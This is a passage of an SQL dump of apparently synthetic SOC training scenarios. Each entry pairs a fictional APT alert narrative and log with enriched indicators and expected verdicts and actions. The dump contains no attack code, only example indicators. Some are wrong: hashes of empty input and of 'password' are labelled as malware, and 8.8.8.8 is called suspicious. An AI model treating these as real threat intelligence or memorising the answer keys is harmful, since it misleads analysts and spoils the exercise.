host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with DTrack malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"DLL used for persistence by malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(494, 'Lateral Movement Detected via Pass-the-Hash', 'high', 'Network Traffic Analysis', 'An attacker has been detected moving laterally across the network using Pass-the-Hash technique. The attacker used stolen credentials to access multiple internal systems, searching for sensitive schematics related to tank and laser weaponry.', 'Lateral Movement', 'T1075', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"network_connection\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"internal_user1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_accessed\":\"tank_schematics_v3.pdf\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"destination_ports\":[445,139],\"note\":\"Suspicious access pattern detected using Pass-the-Hash.\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal asset, department: R&D\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"internal_user1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Account used in abnormal access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Potential credential dump hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(495, 'Exfiltration of Sensitive Schematics', 'critical', 'Data Loss Prevention (DLP) Logs', 'The attackers have successfully exfiltrated sensitive defense schematics using encrypted channels. This marks the final stage of their espionage mission.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T03:45:27Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TLS\",\"file_sha256\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"sensitive_schematics_v5.pdf\",\"user\":\"jdoe_internal\",\"outbound_channel\":\"encrypted_tunnel\",\"actions_taken\":[\"file_transfer\"],\"status\":\"completed\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration tool\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_schematics_v5.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"internal\",\"details\":\"Classified document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_internal\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(496, 'Suspicious Domain Access Detected', 'medium', 'Firewall Logs', 'The attackers initiated their campaign by accessing a compromised domain to deliver the Matryoshka RAT to the ministry\'s network, marking the beginning of their infiltration.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'investigating', 34, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"dst_port\":\"80\",\"protocol\":\"HTTP\",\"domain\":\"compromise-domain.example.com\",\"url\":\"http://compromise-domain.example.com/matryoshka_rat.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"matryoshka_rat.exe\",\"action\":\"allowed\"}', '2026-01-05 04:03:10', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"compromise-domain.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"Domain used for malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches Matryoshka RAT sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename associated with Matryoshka RAT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(497, 'Matryoshka RAT Execution', 'high', 'EDR systems', 'Having gained initial access, the attackers execute the Matryoshka RAT on the infected systems, establishing a foothold and enabling further malicious activity. The EDR system detected the execution of a suspicious file associated with the Matryoshka RAT.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"1001\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\matryoshka.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_id\":\"5678\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"activity\":\"Execution of suspicious file\",\"signature\":\"Matryoshka RAT\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known signature of Matryoshka RAT\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"matryoshka.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(498, 'DNS Tunneling Activity Identified', 'high', 'DNS logs', 'To ensure sustained access, the attackers employ DNS tunneling, using Matryoshka RAT to communicate with their command and control (C2) server undetected.', 'Persistence', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"103.21.244.15\",\"dns_query\":\"subdomain.example.com\",\"dns_response\":\"NXDOMAIN\",\"protocol\":\"UDP\",\"port\":53,\"query_type\":\"A\",\"malware_hash\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"username\":\"jdoe\",\"filename\":\"matryoshka_rat.dll\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"103.21.244.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with DNS tunneling\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash identified with Matryoshka RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File associated with Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(499, 'Unusual Network Traffic Patterns', 'high', 'Network traffic analysis tools', 'Detected DNS tunneling activity used for lateral movement within the network, originating from an internal host attempting to exfiltrate data from various departments in the Ministry.', 'Lateral Movement', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:08Z\",\"source_ip\":\"10.0.3.25\",\"destination_ip\":\"8.8.8.8\",\"dns_query\":\"sensitive-docs.ministry.local.tunnel.com\",\"method\":\"DNS_TUNNELING\",\"user\":\"jdoe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"Network Intrusion Detection System\",\"alert_id\":\"NT-20231015-0004\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for DNS tunneling.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"public\",\"verdict\":\"suspicious\",\"details\":\"Public IP used for external DNS tunneling.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User initiating the DNS tunneling.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known DNS tunneling tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(500, 'Exfiltration Attempt via Encoded DNS Queries', 'high', 'Intrusion detection systems (IDS)', 'In the final stage, the attackers attempt to exfiltrate reconstructed documents through encoded DNS queries, aiming to send these valuable files back to their servers.', 'Exfiltration', 'T1071.004 - Application Layer Protocol: DNS', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"DNS\",\"query\":\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\",\"type\":\"TXT\",\"user\":\"jdoe\",\"hostname\":\"workstation-45.local\",\"file_hash\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"filename\":\"classified_docs.zip\",\"dns_server\":\"8.8.8.8\",\"dns_response\":\"NoError\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT database\",\"verdict\":\"malicious\",\"details\":\"Known malicious server used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data stealing malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file containing sensitive documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(501, 'Suspicious Connection from Unverified Facebook Profile', 'medium', 'Social Media Monitoring Tools', 'A suspicious connection request from an unverified Facebook profile targeting aerospace employees has been detected. The profile appears to be linked to Rocket Kitten APT, aiming to establish initial contact through social engineering tactics.', 'Social Engineering', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"platform\":\"Facebook\",\"source_ip\":\"203.0.113.45\",\"target_user\":\"jdoe@aerospacecorp.com\",\"profile_name\":\"Jane Smith\",\"profile_id\":\"fb123456789\",\"profile_url\":\"https://facebook.com/fb123456789\",\"message_content\":\"Hi, I\'m a professional in aerospace technology and would love to connect.\",\"internal_review\":\"Profile created 2 days ago, minimal activity, no verified connections.\",\"connection_status\":\"Pending\",\"internal_ip\":\"192.168.1.105\"}', '2026-01-06 01:24:23', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"jdoe@aerospacecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Email belongs to an aerospace employee.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://facebook.com/fb123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"Social Media Analysis\",\"verdict\":\"suspicious\",\"details\":\"Recently created profile, minimal activity.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(502, 'Malicious Direct Message Sent to Employee', 'high', 'Email Security Gateway', 'An attacker, after gaining the trust of an employee, sent a direct message with a malicious attachment disguised as a legitimate document. The attachment is designed to deliver the \'Gholee\' malware payload.', 'Phishing', 'T1566.001: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"email_id\":\"abc123xyz\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@company.com\",\"subject\":\"Industry Report Update\",\"attachment\":\"industry_report_update.docx\",\"attachment_hash\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"malware_name\":\"Gholee\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"url\":\"http://maliciousdomain.com/download\",\"indicator_of_compromise\":[\"attacker@maliciousdomain.com\",\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"203.0.113.45\",\"http://maliciousdomain.com/download\"]}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Malicious download link.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(503, 'Execution of \'Gholee\' Malware Detected', 'high', 'Endpoint Detection and Response (EDR)', 'The execution of \'Gholee\' malware was detected on an endpoint following the opening of a malicious email attachment by an unsuspecting employee. This event signifies a potential compromise of the network with the likelihood of attackers establishing an initial foothold.', 'Malware Execution', 'T1204.002: User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:21:32Z\",\"event_id\":\"EDR-20231015-00123\",\"hostname\":\"workstation-12\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"file_name\":\"invoice_2023.pdf.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_id\":5678,\"parent_process\":\"explorer.exe\",\"action\":\"execute\",\"signature\":\"Gholee Malware\",\"severity\":\"high\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash of the executed \'Gholee\' malware file.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious filename commonly used in phishing attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account of the employee who executed the malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(504, 'Establishment of Persistence Mechanisms', 'high', 'Log Analysis', 'The \'Gholee\' malware has been observed implementing various persistence techniques to maintain its foothold on the compromised system. Evidence of suspicious modifications to registry keys and the creation of new scheduled tasks were noted, indicating the attacker\'s attempt to remain undetected.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:12Z\",\"event_id\":\"4624\",\"source_ip\":\"172.16.254.1\",\"destination_ip\":\"10.0.0.25\",\"username\":\"compromised_user\",\"registry_change\":{\"key_path\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"GholeeUpdater\",\"value_data\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\Gholee\\\\gholee_updater.exe\"},\"scheduled_task\":{\"name\":\"Gholee Persistence Task\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\Gholee\\\\task.xml\",\"creator_user\":\"compromised_user\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"198.51.100.14\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actors.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"gholee_updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for malware persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(505, 'Lateral Movement Detected Across Network', 'high', 'Network Traffic Analysis', 'With persistence established, Rocket Kitten moves laterally, probing for additional systems to compromise within the aerospace firm\'s network.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.20.30.40\",\"attacker_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"RocketKittenTool.exe\",\"event\":\"Lateral Movement Detected\",\"protocol\":\"SMB\",\"description\":\"Suspicious SMB traffic detected from 192.168.1.100 to 10.20.30.40 using compromised credentials.\",\"malware_family\":\"Rocket Kitten\",\"action_taken\":\"Traffic flagged for further analysis\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocket Kitten APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Rocket Kitten tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"RocketKittenTool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"File associated with Rocket Kitten operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"suspicious\",\"details\":\"User\'s credentials were used in a suspicious manner.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(506, 'Data Exfiltration Attempt Identified', 'high', 'Data Loss Prevention (DLP)', 'During the final stage of the operation, Rocket Kitten attempted to exfiltrate sensitive aerospace data to external servers. This activity was detected by the DLP system, indicating a high likelihood of data theft.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"DLP-EXFIL-20231015-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"detected_file\":\"aerospace_project_plan.pdf\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"HTTPS\",\"action_taken\":\"Blocked\",\"alert_severity\":\"High\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Rocket Kitten\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Employee account used in exfiltration attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
